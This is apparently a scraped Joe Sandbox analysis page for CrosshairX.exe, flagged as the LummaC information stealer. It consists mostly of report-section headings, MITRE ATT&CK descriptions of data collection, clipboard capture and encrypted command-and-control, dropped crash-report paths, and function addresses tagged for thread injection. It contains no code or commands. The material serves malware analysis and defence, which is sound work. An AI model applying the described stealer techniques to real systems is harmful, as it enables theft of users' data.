Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CrosshairX.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_CrosshairX.exe_3a7c379d35735d73b4b1f5995acd792ecc6f1adf_f5684b01_8a4ed039-3ed9-4d1f-b1fe-2f65d4cf61f8\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER21F9.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2313.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2353.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
CrosshairX.exe

Function 02647F39 Relevance: 42.3, APIs: 11, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Function 026480B6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Function 009A29D7 Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Function 009A0668 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 0043DCC0 Relevance: 32.4, APIs: 11, Strings: 7, Instructions: 917
memorycomCOMMON

Function 03931000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Function 00426970 Relevance: 18.0, APIs: 3, Strings: 7, Instructions: 550
COMMON

Function 0041616F Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 456
COMMON

Function 00423410 Relevance: 10.5, Strings: 8, Instructions: 488
COMMON

Function 0040AE20 Relevance: 7.9, Strings: 6, Instructions: 429
COMMON

Function 00432966 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 307
COMMON

Function 0043106C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 305
COMMON

Function 00438BA0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Function 0040D7E3 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 304
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre